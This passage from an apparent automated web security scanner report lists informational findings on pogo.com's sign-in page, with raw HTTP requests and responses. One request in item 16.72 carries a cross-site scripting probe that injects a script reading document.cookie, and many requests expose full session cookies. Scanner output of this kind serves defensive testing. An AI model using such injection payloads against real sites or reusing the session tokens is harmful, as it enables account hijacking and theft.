Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=myAccount

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=526101589

Request

GET /action/pogo/signin.do?returnType=myAccount HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:44:53 GMT
Server: Apache-Coyote/1.1
Content-Length: 26140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=526101589"></iframe>
...[SNIP]...

16.70. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=oberon&returnValue=http%3A%2F%2Fdownload-games.pogo.com%2FAllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=448020473

Request

GET /action/pogo/signin.do?returnType=oberon&returnValue=http%3A%2F%2Fdownload-games.pogo.com%2FAllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:44:54 GMT
Server: Apache-Coyote/1.1
Content-Length: 26035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=448020473"></iframe>
...[SNIP]...

16.71. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=oberon&returnValue=http%3A%2F%2Fdownload-games.pogo.com%2F%3Frefid%3Dheadernav_fp_shopmenu

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1534550299

Request

GET /action/pogo/signin.do?returnType=oberon&returnValue=http%3A%2F%2Fdownload-games.pogo.com%2F%3Frefid%3Dheadernav_fp_shopmenu HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:54:43 GMT
Server: Apache-Coyote/1.1
Content-Length: 26116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1534550299"></iframe>
...[SNIP]...

16.72. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1877787180

Request

GET /action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1 HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.unid=6606480040153856; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; prod.JID=C0E6107E9294EBED951A4EC6E886F7B9.000257; s_pers=%20s_nr%3D1294537665698-New%7C1297129665698%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:47:40 GMT
Server: Apache-Coyote/1.1
Content-Length: 26233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1877787180"></iframe>
...[SNIP]...

16.73. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=homePage&pageSection=homnav_login

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1711227276

Request

GET /action/pogo/signin.do?returnType=homePage&pageSection=homnav_login HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:54:26 GMT
Server: Apache-Coyote/1.1
Content-Length: 26187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1711227276"></iframe>
...[SNIP]...

16.74. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=prizeMain

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=779320320

Request

GET /action/pogo/signin.do?returnType=prizeMain HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:44:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 26035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=779320320"></iframe>
...[SNIP]...

16.75. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=503225409

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:44:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 26159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=503225409"></iframe>
...[SNIP]...

16.76. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=homePage&pageSection=homnav_login

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=768637040

Request

GET /action/pogo/signin.do?returnType=homePage&pageSection=homnav_login HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:44:54 GMT
Server: Apache-Coyote/1.1
Content-Length: 26102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=768637040"></iframe>
...[SNIP]...

16.77. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=myAccount

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=78455361

Request

GET /action/pogo/signin.do?returnType=myAccount HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:54:33 GMT
Server: Apache-Coyote/1.1
Content-Length: 26138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=78455361"></iframe>
...[SNIP]...

16.78. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=oberon&returnValue=http%3A%2F%2Fdownload-games.pogo.com%2F%3Frefid%3Dheadernav_fp_shopmenu

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=161990458

Request

GET /action/pogo/signin.do?returnType=oberon&returnValue=http%3A%2F%2Fdownload-games.pogo.com%2F%3Frefid%3Dheadernav_fp_shopmenu HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
